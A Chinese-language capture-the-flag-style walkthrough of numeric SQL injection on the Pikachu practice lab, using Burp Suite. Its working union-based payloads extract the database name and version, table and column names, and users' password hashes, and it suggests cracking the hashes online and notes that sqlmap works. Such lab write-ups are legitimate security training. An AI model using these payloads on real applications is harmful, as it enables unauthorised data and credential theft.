数字型注入

使用burp suite工具攻击
如果想要去除干扰信息,后面的id=1可以改成非法id=-2

获取当前数据库名称和版本

  1. 抓包修改参数
1
id=1 union select database(),version()&submit=%E6%9F%A5%E8%AF%A2

upload successful

  1. 可以得出结果
1
2
3
4
5
6
7
select your userid?

hello,vince
your email is: vince@pikachu.com

hello,pikachu
your email is: 5.7.26-0ubuntu0.18.04.1-log

获取该数据库表名

  1. 修改参数
1
id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'&submit=%E6%9F%A5%E8%AF%A2
  1. 结果
1
2
3
4
5
6
7
select your userid?

hello,vince
your email is: vince@pikachu.com

hello,httpinfo,member,message,users,xssblind
your email is: 2

查看表users的列名

  1. 修改参数
1
id=1 union select group_concat(column_name),2 from information_schema.columns where table_schema='pikachu' and table_name='users'&submit=%E6%9F%A5%E8%AF%A2
  1. 结果
1
2
3
4
5
6
7
select your userid?

hello,vince
your email is: vince@pikachu.com

hello,id,username,password,level
your email is: 2

查看表users中的账号密码

  1. 修改参数
1
id=1 union select group_concat(username),group_concat(password) from users&submit=%E6%9F%A5%E8%AF%A2
  1. 结果
1
2
3
4
5
6
7
select your userid?

hello,vince
your email is: vince@pikachu.com

hello,admin,pikachu,test
your email is: e10adc3949ba59abbe56e057f20f883e,670b14728ad9902aecba32e22fa4f6bd,e99a18c428cb38d5f260853678922e03

得到的密码进行解码

随便搜索在线解密
upload successful

其他注入类型原理相似,通过找到SQL命令可执行的格式进行注入,通过sqlmap都能成功注入